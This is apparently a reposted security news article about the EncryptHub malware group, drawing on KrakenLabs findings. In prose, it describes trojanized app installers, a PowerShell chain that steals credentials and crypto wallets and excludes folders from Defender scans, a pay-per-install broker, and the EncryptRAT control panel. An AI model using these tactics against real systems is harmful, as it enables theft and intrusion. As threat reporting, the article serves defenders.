EncryptHub malware operations, attack chain exposed – Go Health Pro

EncryptHub, an emerging malware threat actor that has compromised more than 600 organizations, had details about its operations and attack chain exposed by researchers.In a Thursday blog post, Outpost24’s KrakenLabs Threat Intelligence Team outlined the inner workings of the malware operation, including its structure and techniques for infecting and managing infected systems.The new information about EncryptHub’s tactics was revealed due to operational security lapses by the threat actor itself, according to KrakenLabs. The researchers said key EncryptHub infrastructure components had director listing enabled, stealer logs were hosted alongside malware executables and PowerShell scripts, and Telegram bot configurations used to support EncryptHub’s malware campaigns were also revealed.KrakenLabs also discovered a multi-stage attack chain beginning with the installation of trojanized applications that executed PowerShell scripts to download additional malicious payloads. These trojanized apps imitated popular legitimate applications including WeChat, Google Meet, Microsoft Visual Studio 2022, Palo Alto Global Protect, QQ Talk, QQ Installer, DingTalk and VooV Meeting.

EncryptHub’s attack chain

The initial PowerShell script would download the file payload.ps1, which extracted sensitive data from the victim machine, including cryptocurrency wallet, password manager, VPN session, system and cookie information, and exfiltrated it to the attacker’s server.Payload.ps1 would then download and execute another script called runner.ps1 that led to the installation and running of two Microsoft Common Console Document (MMC) files. Running these files installed an HTML loader that executed three more PowerShell commands that excluded the TEMP folder Windows Defender scans, terminated the previous Microsoft Management Console process launched when the MCS scripts were executed, and downloaded the file ram.ps1.Ram.ps1 is run in the final stage of the attack chain, launching and executing the Rhadamanthys infostealer. EncryptHub, which is also known as LARVA-208, has also been observed by other researchers delivering additional malware, including Stealc and Fickle Stealer, in its campaigns, according to a report by PRODAFT.

EncryptHub uses broker for malware distribution, works on EncryptRAT C2 panel

Another detail about EncryptHub’s operations revealed by KrakenLabs is the use of a third-party pay-per-install (PPI) broker called LabInstalls to help spread its malware. LabInstalls helps automate the distribution of malicious files including executables (.exe) and PowerShell scripts (.ps1) and charges fees based on number of installations, from $10 for 100 installs to $450 for 10,000 installs.The researchers noted that EncryptHub has been using LabInstalls since at least January 2025 as evidenced by a positive review EncryptHub left for the service on the cybercrime forum XSS. Cybercriminals use such PPI broker services to disseminate malware more rapidly and better obscure the origin of their attack campaigns, KrakenLabs noted.EncryptHub was also discovered to be working on its own project called EncryptRAT, which is described as a command-and-control (C2) panel for users to manage their active malware infections, send remote commands, monitor logs from infected devices and configure malware samples and exfiltration channels.EncryptHub is believed to be currently using the tool to manage its own campaigns, with potential plans to offer the tool for sale to other threat actors in the future. The potential commercialization of EncryptRAT is suggested by recent updates to the panel that added support for multiple users and that link different users to different malware samples.EncryptHub continues to develop and improve EncryptRAT and its overall tactics, requiring vigilance from cyber defenders to monitor EncryptHub indicators of compromise (IOCs) and prevent infection by ensuring trusted applications are only installed from legitimate sources.